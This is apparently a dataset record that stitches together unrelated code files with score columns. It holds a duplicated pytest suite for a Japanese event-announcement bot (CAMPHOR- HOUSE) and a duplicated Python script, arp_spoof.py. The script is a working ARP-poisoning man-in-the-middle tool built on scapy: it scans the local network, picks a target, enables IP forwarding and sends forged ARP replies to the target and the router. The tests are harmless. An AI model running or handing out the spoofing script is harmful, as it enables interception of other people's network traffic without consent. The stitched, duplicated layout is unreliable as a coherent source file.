e0 = app.Event(
start=datetime(2021, 8, 7, 17, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 7, 18, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 7, 10, tzinfo=tz),
week=False)
with pytest.raises(ValueError):
mg.generate_messages()
def test_generate_week_message_with_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00 (Make)
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
e0 = app.Event(
start=datetime(2021, 8, 2, 17, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 18, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
e2 = app.Event(
start=datetime(2021, 8, 5, 17, tzinfo=tz),
end=datetime(2021, 8, 5, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
08/02 (月) 17:00〜19:00 (Make)
08/05 (木) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2020, 4, 1, 17, tzinfo=tz),
end=datetime(2020, 4, 1, 19, tzinfo=tz),
url=None,
title="Online Open")
e1 = app.Event(
start=datetime(2020, 4, 3, 17, tzinfo=tz),
end=datetime(2020, 4, 3, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2020, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週のオンライン開館日です!
04/01 (水) 17:00〜19:00
04/03 (金) 17:00〜19:00
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_event(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url=None,
title="Python Event")
mg = app.MessageGenerator(
events=[e0],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_nothing(self):
tz = pytz.timezone("Asia/Tokyo")
mg = app.MessageGenerator(
events=[],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == []
def test_generate_week_message_with_event_and_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_event_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e3 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1, e2, e3],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00 (Make)
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_event_open_make_and_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 1, 18, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Make")
e3 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e4 = app.Event(
start=datetime(2019, 4, 4, 17, tzinfo=tz),
end=datetime(2019, 4, 4, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1, e2, e3, e4],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00 (Make)
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent(f"""\
今週のオンライン開館日です!
04/04 (木) 17:00〜19:00
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")] | tests/test_app.py | from datetime import datetime
import pytest
import pytz
import textwrap
import app
SCHEDULE_LINK = 'https://camph.net/schedule/'
class TestEvent:
def test_from_json(self):
tz = pytz.timezone("Asia/Tokyo")
d = {
"start": "2015-11-02T17:00:00+09:00",
"end": "2015-11-02T20:00:00+09:00",
"url": "https://example.com/",
"title": "Open"
}
e = app.Event.from_json(d)
assert e.start == tz.localize(datetime(2015, 11, 2, 17, 0, 0))
assert e.end == tz.localize(datetime(2015, 11, 2, 20, 0, 0))
assert e.title == "Open"
assert e.url == "https://example.com/"
d = {
"start": "2015-11-02T17:00:00+09:00",
"end": "2015-11-02T20:00:00+09:00",
"url": None,
"title": "Open"
}
e = app.Event.from_json(d)
assert e.start == tz.localize(datetime(2015, 11, 2, 17, 0, 0))
assert e.end == tz.localize(datetime(2015, 11, 2, 20, 0, 0))
assert e.title == "Open"
assert e.url is None
def test_from_json_where_time_is_invalid(self):
d = {
"start": "ABCDEF",
"end": "GHIJK",
"url": None,
"title": "Open"
}
with pytest.raises(ValueError):
app.Event.from_json(d)
def test_from_json_where_json_has_missing_key(self):
d = {
"title": "Open"
}
# TODO: we should raise more appropriate exception?
with pytest.raises(KeyError):
app.Event.from_json(d)
def test_generate_day_messages_with_open(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 15, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
CAMPHOR- Make も利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
e0 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 16, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
CAMPHOR- Make は16:00〜19:00に利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2020, 4, 12, 15, tzinfo=tz),
end=datetime(2020, 4, 12, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e],
now=datetime(2020, 4, 12, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE のオンライン開館時間は15:00〜19:00です。
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_event(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url="https://example.com/",
title="Python Event")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
「Python Event」を17:00〜19:00に開催します!
みなさんのお越しをお待ちしています!!
https://example.com/""")]
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="Python Event")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
「Python Event」を17:00〜19:00に開催します!
みなさんのお越しをお待ちしています!!""")]
def test_generate_day_messages_with_open_make_and_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 7, 17, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 7, 18, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Make")
e2 = app.Event(
start=datetime(2021, 8, 7, 21, tzinfo=tz),
end=datetime(2021, 8, 7, 23, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2021, 8, 7, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は17:00〜19:00です。
CAMPHOR- Make は18:00〜19:00に利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE のオンライン開館時間は21:00〜23:00です。
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_message_where_title_is_missing(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == []
def test_generate_day_message_where_duplicate_events(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 7, 17, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 7, 18, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 7, 10, tzinfo=tz),
week=False)
with pytest.raises(ValueError):
mg.generate_messages()
def test_generate_week_message_with_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00 (Make)
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
e0 = app.Event(
start=datetime(2021, 8, 2, 17, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 18, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
e2 = app.Event(
start=datetime(2021, 8, 5, 17, tzinfo=tz),
end=datetime(2021, 8, 5, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
08/02 (月) 17:00〜19:00 (Make)
08/05 (木) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2020, 4, 1, 17, tzinfo=tz),
end=datetime(2020, 4, 1, 19, tzinfo=tz),
url=None,
title="Online Open")
e1 = app.Event(
start=datetime(2020, 4, 3, 17, tzinfo=tz),
end=datetime(2020, 4, 3, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2020, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週のオンライン開館日です!
04/01 (水) 17:00〜19:00
04/03 (金) 17:00〜19:00
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_event(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url=None,
title="Python Event")
mg = app.MessageGenerator(
events=[e0],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_nothing(self):
tz = pytz.timezone("Asia/Tokyo")
mg = app.MessageGenerator(
events=[],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == []
def test_generate_week_message_with_event_and_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_event_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e3 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1, e2, e3],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00 (Make)
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_event_open_make_and_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 1, 18, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Make")
e3 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e4 = app.Event(
start=datetime(2019, 4, 4, 17, tzinfo=tz),
end=datetime(2019, 4, 4, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1, e2, e3, e4],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00 (Make)
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent(f"""\
今週のオンライン開館日です!
04/04 (木) 17:00〜19:00
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")] | 0.33231 | 0.5526 |
import setup
import scapy.all as scapy
import subprocess
import re
import time
def greet():
subprocess.call(["clear"])
print("ARP Spoofer 0.01 [MITM] by Ravehorn\n")
def ifconfig():
print("Running ifconfig:\n")
subprocess.call(["ifconfig"])
interface = input("Interface -> ")
print("\n")
interface_info = str(subprocess.check_output(["ifconfig", interface]))
my_ip = str(re.findall(r"inet\s\w*\.\w*\.\w*\.\w*", interface_info))
my_ip = re.findall(r"\w*\.\w*\.\w*\.\w*", my_ip)
my_ip = my_ip[0]
scan_range = re.findall(r"\w*\.\w*\.\w*\.", my_ip)
scan_range = scan_range[0]
router_ip = scan_range + "1"
scan_range += "1/24"
return interface, my_ip, scan_range, router_ip
def arping(scan_range, router_ip):
print("Specify range to scan -> " + scan_range)
print("\n")
ans, _ = scapy.srp(scapy.Ether(dst="ff:ff:ff:ff:ff:ff")/scapy.ARP(pdst=scan_range), timeout=2)
ans = list(ans)
answered = {}
for entry in ans:
entry = str(entry)
pdst = re.findall(r"pdst=\w*\.\w*\.\w*\.\w*", entry)
pdst = re.findall(r"\w*\.\w*\.\w*\.\w*", str(pdst))
pdst = pdst[0]
hwsrc = re.findall(r"hwsrc=\w*:\w*:\w*:\w*:\w*:\w*", entry)
hwsrc = re.findall(r"\w*:\w*:\w*:\w*:\w*:\w*", str(hwsrc))
hwsrc = hwsrc[0]
answered[pdst] = hwsrc
for pair in answered.items():
print(pair)
router_mac = answered[router_ip]
print("\n")
return router_mac, answered
def select(my_ip, router_ip, router_mac, answered):
print("Your IP -> " + my_ip)
print("Router IP -> " + router_ip)
print("Router MAC -> " + router_mac)
target_ip = input("Target IP -> ")
target_mac = answered[target_ip]
print("Target MAC -> " + target_mac)
return target_mac, target_ip
def port_forwarding():
print("\nEnabling PF:")
subprocess.call("echo 1 > /proc/sys/net/ipv4/ip_forward", shell=True)
print("Done.\n")
def create_packets(mode, target_ip, target_mac, router_ip, router_mac):
if mode == "spoof":
target_packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=router_ip)
router_packet = scapy.ARP(op=2, pdst=router_ip, hwdst=router_mac, psrc=target_ip)
elif mode == "restore":
target_packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=router_ip, hwsrc=router_mac)
router_packet = scapy.ARP(op=2, pdst=router_ip, hwdst=router_mac, psrc=target_ip, hwsrc=target_mac)
return target_packet, router_packet
def spoof(target_packet, router_packet, target_ip, target_mac, router_ip, router_mac):
print("Spoofing:")
try:
packets_count = 0
while True:
scapy.send(target_packet, verbose=False)
scapy.send(router_packet, verbose=False)
packets_count += 2
print("\r[+] Packets sent: " + str(packets_count), end="")
time.sleep(2)
except KeyboardInterrupt:
print("\n")
target_packet, router_packet = create_packets("restore", target_ip, target_mac, router_ip, router_mac)
restore(target_packet, router_packet)
print("Quitting.")
def restore(target_packet, router_packet):
scapy.send(target_packet, verbose=False)
scapy.send(router_packet, verbose=False)
print("Normal connection restored.")
greet()
interface, my_ip, scan_range, router_ip = ifconfig()
router_mac, answered = arping(scan_range, router_ip)
target_mac, target_ip = select(my_ip, router_ip, router_mac, answered)
port_forwarding()
target_packet, router_packet = create_packets("spoof", target_ip, target_mac, router_ip, router_mac)
spoof(target_packet, router_packet, target_ip, target_mac, router_ip, router_mac) | arp_spoof.py | import setup
import scapy.all as scapy
import subprocess
import re
import time
def greet():
subprocess.call(["clear"])
print("ARP Spoofer 0.01 [MITM] by Ravehorn\n")
def ifconfig():
print("Running ifconfig:\n")
subprocess.call(["ifconfig"])
interface = input("Interface -> ")
print("\n")
interface_info = str(subprocess.check_output(["ifconfig", interface]))
my_ip = str(re.findall(r"inet\s\w*\.\w*\.\w*\.\w*", interface_info))
my_ip = re.findall(r"\w*\.\w*\.\w*\.\w*", my_ip)
my_ip = my_ip[0]
scan_range = re.findall(r"\w*\.\w*\.\w*\.", my_ip)
scan_range = scan_range[0]
router_ip = scan_range + "1"
scan_range += "1/24"
return interface, my_ip, scan_range, router_ip
def arping(scan_range, router_ip):
print("Specify range to scan -> " + scan_range)
print("\n")
ans, _ = scapy.srp(scapy.Ether(dst="ff:ff:ff:ff:ff:ff")/scapy.ARP(pdst=scan_range), timeout=2)
ans = list(ans)
answered = {}
for entry in ans:
entry = str(entry)
pdst = re.findall(r"pdst=\w*\.\w*\.\w*\.\w*", entry)
pdst = re.findall(r"\w*\.\w*\.\w*\.\w*", str(pdst))
pdst = pdst[0]
hwsrc = re.findall(r"hwsrc=\w*:\w*:\w*:\w*:\w*:\w*", entry)
hwsrc = re.findall(r"\w*:\w*:\w*:\w*:\w*:\w*", str(hwsrc))
hwsrc = hwsrc[0]
answered[pdst] = hwsrc
for pair in answered.items():
print(pair)
router_mac = answered[router_ip]
print("\n")
return router_mac, answered
def select(my_ip, router_ip, router_mac, answered):
print("Your IP -> " + my_ip)
print("Router IP -> " + router_ip)
print("Router MAC -> " + router_mac)
target_ip = input("Target IP -> ")
target_mac = answered[target_ip]
print("Target MAC -> " + target_mac)
return target_mac, target_ip
def port_forwarding():
print("\nEnabling PF:")
subprocess.call("echo 1 > /proc/sys/net/ipv4/ip_forward", shell=True)
print("Done.\n")
def create_packets(mode, target_ip, target_mac, router_ip, router_mac):
if mode == "spoof":
target_packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=router_ip)
router_packet = scapy.ARP(op=2, pdst=router_ip, hwdst=router_mac, psrc=target_ip)
elif mode == "restore":
target_packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=router_ip, hwsrc=router_mac)
router_packet = scapy.ARP(op=2, pdst=router_ip, hwdst=router_mac, psrc=target_ip, hwsrc=target_mac)
return target_packet, router_packet
def spoof(target_packet, router_packet, target_ip, target_mac, router_ip, router_mac):
print("Spoofing:")
try:
packets_count = 0
while True:
scapy.send(target_packet, verbose=False)
scapy.send(router_packet, verbose=False)
packets_count += 2
print("\r[+] Packets sent: " + str(packets_count), end="")
time.sleep(2)
except KeyboardInterrupt:
print("\n")
target_packet, router_packet = create_packets("restore", target_ip, target_mac, router_ip, router_mac)
restore(target_packet, router_packet)
print("Quitting.")
def restore(target_packet, router_packet):
scapy.send(target_packet, verbose=False)
scapy.send(router_packet, verbose=False)
print("Normal connection restored.")
greet()
interface, my_ip, scan_range, router_ip = ifconfig()
router_mac, answered = arping(scan_range, router_ip)
target_mac, target_ip = select(my_ip, router_ip, router_mac, answered)
port_forwarding()
target_packet, router_packet = create_packets("spoof", target_ip, target_mac, router_ip, router_mac)
